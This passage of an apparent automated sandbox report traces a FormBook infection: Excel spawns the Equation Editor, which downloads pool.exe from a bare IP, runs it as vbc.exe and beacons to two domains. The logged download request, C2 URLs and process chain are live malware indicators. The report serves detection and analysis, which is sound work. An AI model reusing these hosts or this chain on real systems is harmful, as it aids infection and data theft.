                                                                                                                                                  Jul 22, 2021 17:15:03.148499012 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.148503065 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.148518085 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.148519039 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.148535967 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.148535967 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.148554087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.148571014 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149463892 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149487019 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149501085 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149519920 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149534941 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149540901 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149559021 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149564028 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149564028 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149574041 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149585009 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149596930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149606943 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149622917 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149626970 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149636984 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149642944 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149652004 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149682045 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149698019 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149717093 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149728060 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149755955 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149810076 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149836063 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149844885 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149852037 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149856091 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149868965 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149876118 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149883032 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149895906 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149909973 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149916887 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149925947 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149936914 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149950027 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149959087 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149965048 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.149982929 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.149991035 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.150007010 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150017977 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.150028944 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150033951 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194576025 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194581985 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194603920 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194626093 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194624901 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194652081 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194663048 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194669962 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194675922 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194699049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194721937 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194725037 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194744110 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194745064 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194755077 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194767952 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194778919 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194789886 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194792986 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194813013 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194839001 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194860935 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194863081 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194885015 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194906950 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194928885 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194936991 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194952011 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194952965 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194974899 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194991112 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194997072 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195024014 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195041895 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195046902 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195056915 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195065975 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195080042 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195091963 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195101976 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195123911 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195137024 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195162058 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195224047 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195246935 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195260048 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195270061 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195276976 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195287943 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195302010 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195323944 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195324898 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195348978 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195348978 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195363998 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195394993 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195497990 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195519924 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195542097 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195558071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195563078 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195565939 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195578098 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195591927 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195607901 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195615053 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195635080 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195636034 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195642948 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195658922 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195667982 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195682049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195696115 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195698977 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195743084 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195755959 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.201230049 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.202836037 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.884951115 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:16:38.317858934 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.442656040 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.442775965 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.442984104 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.567553043 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568079948 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568145990 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568177938 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568193913 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568216085 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568347931 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.568492889 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:43.640398979 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.685012102 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.686702967 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.686728001 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.733503103 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.832999945 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.833024025 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.833038092 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.833173037 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.833276033 CEST4916780192.168.2.22151.101.0.119

                                                                                                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:16:37.906949043 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:38.297278881 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:16:43.574949026 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:43.638854027 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:16:48.827698946 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:49.840526104 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:16:49.950583935 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:16:51.092057943 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22

                                                                                                                                                  ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 22, 2021 17:16:51.093327045 CEST | 192.168.2.22 | 8.8.8.8 | d041 | (Port unreachable) | Destination Unreachable

                                                                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:16:37.906949043 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.pon.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.574949026 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.intoxickiss.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:48.827698946 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.800pls.info | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:49.840526104 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.800pls.info | A (IP address) | IN (0x0001)

                                                                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:16:38.297278881 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.pon.xyz | 71822.bodis.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:16:38.297278881 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | 71822.bodis.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.intoxickiss.com | intoxickiss.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.0.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.64.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.128.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:43.638854027 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | intoxickiss.com | | 151.101.192.119 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:49.950583935 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | Name error (3) | www.800pls.info | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:16:51.092057943 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | Name error (3) | www.800pls.info | none | none | A (IP address) | IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 3.121.113.175
                                                                                                                                                  • www.pon.xyz
                                                                                                                                                  • www.intoxickiss.com

                                                                                                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 3.121.113.175 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:15:02.789858103 CEST | 0 | OUT | GET /www/pool.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 3.121.113.175
                                                                                                                                                  Connection: Keep-Alive
Jul 22, 2021 17:15:02.833070993 CEST | 1 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:14:54 GMT
                                                                                                                                                  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                  Last-Modified: Thu, 22 Jul 2021 05:09:55 GMT
                                                                                                                                                  ETag: "ae200-5c7af4c3e3d9d"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 713216
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:16:38.442984104 CEST | 755 | OUT | GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1
                                                                                                                                                  Host: www.pon.xyz
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
Jul 22, 2021 17:16:38.568079948 CEST | 756 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:38 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NfckuEfRDoobrXb4RjADejgmV/38jhHArz5PznadVW/EOMjYWMA8MO/wUYEIfOHtudiTqbwWGyf8XYQ99hFcOA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 151.101.0.119 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:16:43.686728001 CEST | 760 | OUT | GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1
                                                                                                                                                  Host: www.intoxickiss.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
Jul 22, 2021 17:16:43.832999945 CEST | 761 | IN | HTTP/1.1 302 Found
                                                                                                                                                  server: adobe
                                                                                                                                                  cache-control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
                                                                                                                                                  location: https://portfolio.adobe.com/missing
                                                                                                                                                  x-trace-id: nhEa/ME/ozF9cbxuUwEh+E96PhQ
                                                                                                                                                  x-app-name: Pro2-Renderer
                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:16:43 GMT
                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Served-By: cache-hhn4076-HHN
                                                                                                                                                  X-Cache: MISS
                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                  X-Timer: S1626967004.724224,VS0,VE99
                                                                                                                                                  Vary: Fastly-SSL, X-Use-Renderer
Jul 22, 2021 17:16:43.833024025 CEST | 761 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Memory Usage

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Behavior

                                                                                                                                                  System Behavior

                                                                                                                                                  General

Start time: 17:14:41
Start date: 22/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fcd0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:03
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:04
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x270000
                                                                                                                                                  File size:713216 bytes
                                                                                                                                                  MD5 hash:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:25
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                  Imagebase:0x270000
                                                                                                                                                  File size:713216 bytes
                                                                                                                                                  MD5 hash:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:27
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:53
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:44544 bytes
                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
